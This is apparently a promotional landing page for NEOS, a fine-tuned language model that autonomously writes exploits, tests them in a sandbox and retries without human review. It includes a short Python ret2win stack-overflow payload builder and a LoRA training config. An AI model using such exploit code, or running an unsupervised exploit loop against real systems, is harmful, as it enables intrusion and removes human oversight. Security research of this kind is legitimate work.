autonomous exploit generation —

The model
that finds
the hole.

NEOS is a language model fine-tuned for offensive security. It generates exploits, tests them against a live target, and retries — without a human in the loop.

Built on Qwen2.5-32B (Apache 2.0). Trained on 20,000+ real cybersecurity examples. Stack overflows, ROP chains, format strings, binary reversing.

Not a chatbot. A pipeline.

58% stack overflow success — v6
75–85% projected — v7 in training
$38 total training cost
up to 4 autonomous retries per target
131k token context window
01 ABOUT THE MODEL

NEOS started as a question: can a model trained cheaply on real exploit data close the gap with human CTF players? The answer, so far, is yes.

The autonomous loop works like this — given a binary or challenge, NEOS generates candidate exploit code, runs it against the target inside a sandbox, reads the crash output, and refines. It does this up to four times before giving up. On stack overflow targets it currently wins more than half the time.

v7 introduces 21,000 examples covering a wider range of vulnerability classes. Early evals suggest a jump to 75–85% success on the same benchmark set. Total training cost: still under $40.

BASE Qwen2.5-32B-Instruct
LICENSE Apache 2.0
METHOD LoRA fine-tuning
QUANT 4-bit NF4 / FP16
CONTEXT 131,072 tokens
HOSTED HuggingFace
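The LoRA-on-4-bit setup listed above typically looks like the following with Hugging Face `transformers` and `peft`. Every hyperparameter here (rank, alpha, target modules) is illustrative, not NEOS's actual configuration; only the base model name and the quantization scheme come from the spec.

```python
import torch
from transformers import AutoModelForCausalLM, BitsAndBytesConfig
from peft import LoraConfig, get_peft_model

# 4-bit NF4 quantization with FP16 compute, per the spec above
bnb = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_quant_type="nf4",
    bnb_4bit_compute_dtype=torch.float16,
)
model = AutoModelForCausalLM.from_pretrained(
    "Qwen/Qwen2.5-32B-Instruct",
    quantization_config=bnb,
    device_map="auto",
)

# LoRA adapters on the attention projections (hypothetical rank/alpha)
lora = LoraConfig(
    r=16,
    lora_alpha=32,
    lora_dropout=0.05,
    target_modules=["q_proj", "k_proj", "v_proj", "o_proj"],
    task_type="CAUSAL_LM",
)
model = get_peft_model(model, lora)  # only adapter weights are trained
```

Freezing the quantized base and training only the adapters is what keeps a 32B fine-tune in the tens-of-dollars range.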
02 PROJECT STATUS
■ LIVE
v6 — functional
Stack overflow, ret2win, basic ROP chains. Autonomous loop confirmed. Benchmark complete.
58%
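The ret2win class above reduces to overflowing a stack buffer until the saved return address is overwritten with the address of a win function. A minimal illustrative payload builder, where the 40-byte offset and the `0x401196` address are hypothetical values for some target binary:

```python
import struct

def ret2win_payload(offset: int, win_addr: int) -> bytes:
    """Pad up to the saved return address, then overwrite it (x86-64, little-endian)."""
    padding = b"A" * offset            # fill the buffer and saved RBP
    ret = struct.pack("<Q", win_addr)  # 8-byte little-endian return address
    return padding + ret

# e.g. a 40-byte offset with a hypothetical win() at 0x401196
payload = ret2win_payload(40, 0x401196)
```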
■ WIP
v7 — training
21k examples, broader vuln classes. Early evals look good.
~80%
■ NEXT
Public benchmarks
Full eval results + model weights on HuggingFace once v7 completes.
■ NEXT
API access
Hosted inference for red teams and security researchers. Early access via contact below.
03 CONTACT
EMAIL hola@ne-os.com GITHUB rodrigoignaci0 HUGGINGFACE huggingface.co/NEOS LINKEDIN your-profile